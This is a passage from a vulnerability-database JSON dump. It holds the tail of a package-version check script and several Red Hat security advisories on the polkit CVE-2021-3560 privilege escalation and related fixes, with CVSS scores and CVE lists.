NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n 
(applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'redhat-virtualization-host-image-update');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2023-08-16T15:29:43", "description": "The polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:08", "type": "redhat", "title": "(RHSA-2021:2236) Important: polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T09:50:56", "id": "RHSA-2021:2236", "href": "https://access.redhat.com/errata/RHSA-2021:2236", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:29:43", "description": "The polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:47", "type": "redhat", "title": "(RHSA-2021:2238) Important: polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T10:41:51", "id": "RHSA-2021:2238", "href": "https://access.redhat.com/errata/RHSA-2021:2238", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:29:43", "description": "The polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:25", "type": "redhat", "title": "(RHSA-2021:2237) Important: polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T10:41:46", "id": "RHSA-2021:2237", "href": "https://access.redhat.com/errata/RHSA-2021:2237", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:29:43", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.7.19. See the following advisory for the container images for this release:\n\nhttps://access.redhat.com/errata/RHSA-2021:2554\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\n* dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient (CVE-2021-25217)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. 
Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-between-minor.html#understanding-upgrade-channels_updating-cluster-between-minor", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T11:01:04", "type": "redhat", "title": "(RHSA-2021:2555) Important: OpenShift Container Platform 4.7.19 packages and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25217", "CVE-2021-3560"], "modified": "2021-07-06T11:24:04", "id": "RHSA-2021:2555", "href": "https://access.redhat.com/errata/RHSA-2021:2555", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:29:43", "description": "The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. 
RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.\n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks. \n\nThe ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.\n\nSecurity Fix(es):\n\n* glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits (CVE-2021-27219)\n\n* kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run (CVE-2021-3501)\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\n* hw: vt-d related privilege escalation (CVE-2020-24489)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Previously, systemtap dependencies were not included in the RHV-H channel. Therefore, systemtap could not be installed.\nIn this release, the systemtap dependencies have been included in the channel, resolving the issue. 
(BZ#1903997)", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-06-22T14:31:38", "type": "redhat", "title": "(RHSA-2021:2522) Important: Red Hat Virtualization Host security update [ovirt-4.4.6]", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24489", "CVE-2021-27219", "CVE-2021-3501", "CVE-2021-3560"], "modified": "2021-06-22T14:45:07", "id": "RHSA-2021:2522", "href": "https://access.redhat.com/errata/RHSA-2021:2522", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-12T04:36:23", "description": "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization <version_number> 
images:\n\nRHEL-8-CNV-2.6\n\nhostpath-provisioner-container-v2.6.6-3\nvm-import-controller-container-v2.6.6-5\nvm-import-virtv2v-container-v2.6.6-5\nvm-import-operator-container-v2.6.6-5\nvirt-cdi-apiserver-container-v2.6.6-4\nvirt-cdi-controller-container-v2.6.6-4\nvirt-cdi-cloner-container-v2.6.6-4\nvirt-cdi-importer-container-v2.6.6-4\nvirt-cdi-uploadserver-container-v2.6.6-4\nvirt-cdi-uploadproxy-container-v2.6.6-4\nvirt-cdi-operator-container-v2.6.6-4\novs-cni-marker-container-v2.6.6-5\nkubevirt-ssp-operator-container-v2.6.6-5\nkubemacpool-container-v2.6.6-7\nkubevirt-vmware-container-v2.6.6-4\nkubevirt-kvm-info-nfd-plugin-container-v2.6.6-4\nkubevirt-cpu-model-nfd-plugin-container-v2.6.6-4\nkubevirt-cpu-node-labeller-container-v2.6.6-4\nvirtio-win-container-v2.6.6-4\nkubevirt-template-validator-container-v2.6.6-4\ncnv-containernetworking-plugins-container-v2.6.6-4\nnode-maintenance-operator-container-v2.6.6-4\nkubevirt-v2v-conversion-container-v2.6.6-4\ncluster-network-addons-operator-container-v2.6.6-4\novs-cni-plugin-container-v2.6.6-4\nbridge-marker-container-v2.6.6-4\nkubernetes-nmstate-handler-container-v2.6.6-7\nhyperconverged-cluster-webhook-container-v2.6.6-4\ncnv-must-gather-container-v2.6.6-16\nhyperconverged-cluster-operator-container-v2.6.6-4\nvirt-launcher-container-v2.6.6-7\nhostpath-provisioner-operator-container-v2.6.6-5\nvirt-api-container-v2.6.6-7\nvirt-handler-container-v2.6.6-7\nvirt-controller-container-v2.6.6-7\nvirt-operator-container-v2.6.6-7\nhco-bundle-registry-container-v2.6.6-70\n\nSecurity Fix(es):\n\n* golang: crypto/elliptic: incorrect operations on the P-224 curve (CVE-2021-3114)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T13:16:13", "type": "redhat", "title": "(RHSA-2021:3119) Moderate: OpenShift Virtualization 2.6.6 Images security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10228", "CVE-2017-14502", "CVE-2019-13012", "CVE-2019-14866", "CVE-2019-25013", "CVE-2019-25032", "CVE-2019-25034", "CVE-2019-25035", "CVE-2019-25036", "CVE-2019-25037", "CVE-2019-25038", "CVE-2019-25039", "CVE-2019-25040", "CVE-2019-25041", "CVE-2019-25042", "CVE-2019-2708", "CVE-2019-9169", "CVE-2020-12362", "CVE-2020-12363", "CVE-2020-12364", "CVE-2020-13434", "CVE-2020-13543", "CVE-2020-13584", "CVE-2020-14344", "CVE-2020-14345", "CVE-2020-14346", "CVE-2020-14347", "CVE-2020-14360", "CVE-2020-14361", "CVE-2020-14362", "CVE-2020-14363", "CVE-2020-15358", "CVE-2020-25659", "CVE-2020-25712", "CVE-2020-26116", "CVE-2020-26137", "CVE-2020-27618", "CVE-2020-27619", "CVE-2020-28196", "CVE-2020-28935", "CVE-2020-29361", "CVE-2020-29362", "CVE-2020-29363", "CVE-2020-36242", "CVE-2020-8231", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8927", "CVE-2020-9948", "CVE-2020-9951", "CVE-2020-9983", "CVE-2021-20201", "CVE-2021-20271", "CVE-2021-23239", "CVE-2021-23240", "CVE-2021-23336", "CVE-2021-25215", 
"CVE-2021-25217", "CVE-2021-27219", "CVE-2021-28211", "CVE-2021-3114", "CVE-2021-3177", "CVE-2021-32399", "CVE-2021-3326", "CVE-2021-33909", "CVE-2021-33910", "CVE-2021-3516", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3537", "CVE-2021-3541", "CVE-2021-3560"], "modified": "2021-08-10T13:16:44", "id": "RHSA-2021:3119", "href": "https://access.redhat.com/errata/RHSA-2021:3119", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-12T04:36:23", "description": "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.8.0 images:\n\nRHEL-8-CNV-4.8\n==============\n\nkubevirt-template-validator-container-v4.8.0-9\nkubevirt-ssp-operator-container-v4.8.0-41\nvirt-cdi-uploadserver-container-v4.8.0-25\ncnv-must-gather-container-v4.8.0-50\nvirt-cdi-uploadproxy-container-v4.8.0-25\nvirt-cdi-cloner-container-v4.8.0-25\nvirt-cdi-apiserver-container-v4.8.0-25\nkubevirt-v2v-conversion-container-v4.8.0-10\nhostpath-provisioner-operator-container-v4.8.0-17\nhyperconverged-cluster-webhook-container-v4.8.0-62\nhyperconverged-cluster-operator-container-v4.8.0-62\nvirt-cdi-operator-container-v4.8.0-25\nvirt-cdi-importer-container-v4.8.0-25\nvirt-cdi-controller-container-v4.8.0-25\ncnv-containernetworking-plugins-container-v4.8.0-14\nkubemacpool-container-v4.8.0-22\novs-cni-plugin-container-v4.8.0-17\novs-cni-marker-container-v4.8.0-17\nbridge-marker-container-v4.8.0-17\ncluster-network-addons-operator-container-v4.8.0-28\nkubernetes-nmstate-handler-container-v4.8.0-21\nvirtio-win-container-v4.8.0-9\nkubevirt-vmware-container-v4.8.0-11\nhostpath-provisioner-container-v4.8.0-14\nnode-maintenance-operator-container-v4.8.0-19\nvirt-launcher-container-v4.8.0-67\nvm-import-virtv2v-container-v4.8.0-18\nvm-import-controller-container-v4.8.0-18\nvm-import-operator-container-v4.8.0-18\nvirt-handler-container-v4.8.0-67\nvirt-a
pi-container-v4.8.0-67\nvirt-controller-container-v4.8.0-67\nvirt-operator-container-v4.8.0-67\nhco-bundle-registry-container-v4.8.0-451\n\nSecurity Fix(es):\n\n* golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813)\n\n* golang: crypto/elliptic: incorrect operations on the P-224 curve (CVE-2021-3114)\n\n* ulikunitz/xz: Infinite loop in readUvarint allows for denial of service (CVE-2021-29482)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-27T12:20:29", "type": "redhat", "title": "(RHSA-2021:2920) Moderate: OpenShift Virtualization 4.8.0 Images", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10228", "CVE-2017-14502", "CVE-2019-13012", "CVE-2019-14866", 
"CVE-2019-25013", "CVE-2019-25032", "CVE-2019-25034", "CVE-2019-25035", "CVE-2019-25036", "CVE-2019-25037", "CVE-2019-25038", "CVE-2019-25039", "CVE-2019-25040", "CVE-2019-25041", "CVE-2019-25042", "CVE-2019-2708", "CVE-2019-3842", "CVE-2019-9169", "CVE-2020-12362", "CVE-2020-12363", "CVE-2020-12364", "CVE-2020-13434", "CVE-2020-13543", "CVE-2020-13584", "CVE-2020-13776", "CVE-2020-14344", "CVE-2020-14345", "CVE-2020-14346", "CVE-2020-14347", "CVE-2020-14360", "CVE-2020-14361", "CVE-2020-14362", "CVE-2020-14363", "CVE-2020-15358", "CVE-2020-24977", "CVE-2020-25659", "CVE-2020-25712", "CVE-2020-26116", "CVE-2020-26137", "CVE-2020-26541", "CVE-2020-27618", "CVE-2020-27619", "CVE-2020-27813", "CVE-2020-28196", "CVE-2020-28935", "CVE-2020-29361", "CVE-2020-29362", "CVE-2020-29363", "CVE-2020-29652", "CVE-2020-36242", "CVE-2020-8231", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8927", "CVE-2020-9948", "CVE-2020-9951", "CVE-2020-9983", "CVE-2021-20201", "CVE-2021-20271", "CVE-2021-23239", "CVE-2021-23240", "CVE-2021-23336", "CVE-2021-25215", "CVE-2021-25217", "CVE-2021-27219", "CVE-2021-28211", "CVE-2021-29482", "CVE-2021-3114", "CVE-2021-3121", "CVE-2021-3177", "CVE-2021-33034", "CVE-2021-3326", "CVE-2021-3516", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3537", "CVE-2021-3541", "CVE-2021-3560"], "modified": "2021-07-27T12:21:10", "id": "RHSA-2021:2920", "href": "https://access.redhat.com/errata/RHSA-2021:2920", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-12T04:36:23", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.3.0 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. 
Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs and security issues. See\nthe following Release Notes documentation, which will be updated shortly\nfor this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.3/html/release_notes/\n\nSecurity:\n\n* fastify-reply-from: crafted URL allows prefix scape of the proxied backend service (CVE-2021-21321)\n\n* fastify-http-proxy: crafted URL allows prefix scape of the proxied\nbackend service (CVE-2021-21322)\n\n* nodejs-netmask: improper input validation of octal input data (CVE-2021-28918)\n\n* redis: Integer overflow via STRALGO LCS command (CVE-2021-29477)\n\n* redis: Integer overflow via COPY command for large intsets (CVE-2021-29478)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n(CVE-2020-28500)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension (CVE-2020-28851)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing\nbcp47 tag (CVE-2020-28852)\n\n* nodejs-ansi_up: XSS due to insufficient URL sanitization (CVE-2021-3377)\n\n* oras: zip-slip vulnerability via oras-pull (CVE-2021-21272)\n\n* redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)\n\n* nodejs-lodash: command injection via template (CVE-2021-23337)\n\n* nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() (CVE-2021-23362)\n\n* browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS) (CVE-2021-23364)\n\n* nodejs-postcss: Regular expression 
denial of service during source map parsing (CVE-2021-23368)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option (CVE-2021-23369)\n\n* nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js (CVE-2021-23382)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option (CVE-2021-23383)\n\n* openssl: integer overflow in CipherUpdate (CVE-2021-23840)\n\n* openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n(CVE-2021-23841)\n\n* nodejs-ua-parser-js: ReDoS via malicious User-Agent header (CVE-2021-27292)\n\n* grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call (CVE-2021-27358)\n\n* nodejs-is-svg: ReDoS via malicious string (CVE-2021-28092)\n\n* nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character (CVE-2021-29418)\n\n* ulikunitz/xz: Infinite loop in readUvarint allows for denial of service (CVE-2021-29482)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)\n\n* html-parse-stringify: Regular Expression DoS (CVE-2021-23346)\n\n* openssl: incorrect SSLv2 rollback protection (CVE-2021-23839)\n\nFor more details about the security issues, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npages listed in the References section.\n\nBugs:\n\n* RFE Make the source code for the endpoint-metrics-operator public (BZ# 1913444)\n\n* cluster became offline after apiserver health check (BZ# 1942589)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-05T12:52:42", "type": "redhat", "title": "(RHSA-2021:3016) Important: Red Hat Advanced Cluster Management for Kubernetes version 2.3", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10228", "CVE-2017-14502", "CVE-2018-1000858", "CVE-2018-20843", "CVE-2019-13050", "CVE-2019-13627", "CVE-2019-14889", "CVE-2019-15903", "CVE-2019-19906", "CVE-2019-20454", "CVE-2019-20934", "CVE-2019-25013", "CVE-2019-2708", "CVE-2019-9169", "CVE-2020-11668", "CVE-2020-13434", "CVE-2020-15358", "CVE-2020-1730", "CVE-2020-27618", "CVE-2020-28196", "CVE-2020-28469", "CVE-2020-28500", "CVE-2020-28851", "CVE-2020-28852", "CVE-2020-29361", "CVE-2020-29362", "CVE-2020-29363", "CVE-2020-8231", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8927", "CVE-2021-20271", "CVE-2021-20305", "CVE-2021-21272", "CVE-2021-21309", "CVE-2021-21321", "CVE-2021-21322", "CVE-2021-23337", "CVE-2021-23343", "CVE-2021-23346", "CVE-2021-23362", "CVE-2021-23364", "CVE-2021-23368", "CVE-2021-23369", "CVE-2021-23382", "CVE-2021-23383", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-25217", "CVE-2021-27219", "CVE-2021-27292", "CVE-2021-27358", "CVE-2021-28092", "CVE-2021-28918", "CVE-2021-29418", "CVE-2021-29477", "CVE-2021-29478", "CVE-2021-29482", "CVE-2021-32399", 
